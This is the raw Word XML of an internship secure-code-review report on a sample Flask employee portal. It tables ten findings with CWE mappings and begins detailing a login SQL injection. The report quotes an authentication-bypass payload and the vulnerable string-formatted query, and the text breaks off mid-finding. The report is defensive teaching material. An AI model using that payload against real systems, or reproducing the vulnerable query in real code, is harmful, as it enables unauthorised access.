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Secure Coding Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Application: Employee Portal (Python / Flask)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Internship Task 3 — Application Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: 16 July 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report documents a secure code review of a sample Flask-based Employee Portal application, performed as Internship Task 3. The review combined manual, line-by-line inspection with static pattern analysis to identify vulnerabilities in authentication, data access, and input handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The review identified 10 distinct findings: 4 Critical, 4 High, and 2 Medium severity. The most serious issues — SQL injection, OS command injection, insecure deserialization, and broken access control — would each independently allow an attacker to compromise the confidentiality, integrity, or availability of the system. A fully remediated version of the application is included alongside this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope &amp; Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application: single-file Flask service (app.py) simulating an internal HR/employee portal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Functionality reviewed: login/authentication, session handling, employee record lookup, file download, a diagnostic ping utility, a profile import endpoint, and an admin salary-update endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Out of scope: infrastructure/network configuration, third-party dependency CVE scanning, and load/availability testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manual source code review of every route handler, cross-referenced against the OWASP Top 10 (2021) and the CWE Top 25 Most Dangerous Software Weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pattern-based static analysis: targeted searches for known-risky APIs and constructs (shell=True, pickle.loads, unsalted hashing, string-formatted SQL, hardcoded secrets, debug flags).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note on tooling: in a full engagement this stage would additionally run an automated SAST tool such as Bandit (Python-specific) or Semgrep against the same rule set to cross-check manual findings and catch anything missed; the same categories of issue were confirmed here through manual inspection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each finding was mapped to a CWE identifier and an OWASP Top 10 (2021) category, then rated for severity based on exploitability and impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Findings are ordered by severity, Critical first.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200"/>
        <w:gridCol w:w="1400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="1F3A5F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:shd w:fill="1F3A5F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F3A5F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="1F3A5F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</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VULN-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection (login)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FBE1E1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B00020"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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VULN-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OS Command Injection (/ping)</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CWE-78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FBE1E1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B00020"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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VULN-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure Deserialization (pickle)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CWE-502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FBE1E1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B00020"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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VULN-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Access Control / IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-862 / CWE-639</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FBE1E1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B00020"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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VULN-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardcoded Secret Key</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CWE-798</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C77700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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VULN-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak, Unsalted Password Hashing (MD5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-916</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C77700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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VULN-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reflected Cross-Site Scripting (XSS)</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CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C77700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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VULN-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Path Traversal (/download)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FDEDE0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C77700"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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VULN-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Missing CSRF Protection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CWE-352</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFF7DA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8A6D00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Misconfiguration (debug mode)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CWE-489 / CWE-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFF7DA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8A6D00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-03 — SQL Injection in Login Endpoint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BE1E1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B00020"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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CWE-89</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A03:2021 – Injection</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login(), line ~55</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The login query is built by directly interpolating the raw 'username' form field into a SQL string. An attacker can close the quoted literal and inject arbitrary SQL, for example submitting a username of  ' OR '1'='1' -- to bypass authentication entirely, or to extract data from other tables via UNION-based injection.</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query = "SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (username, hash_password(password))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
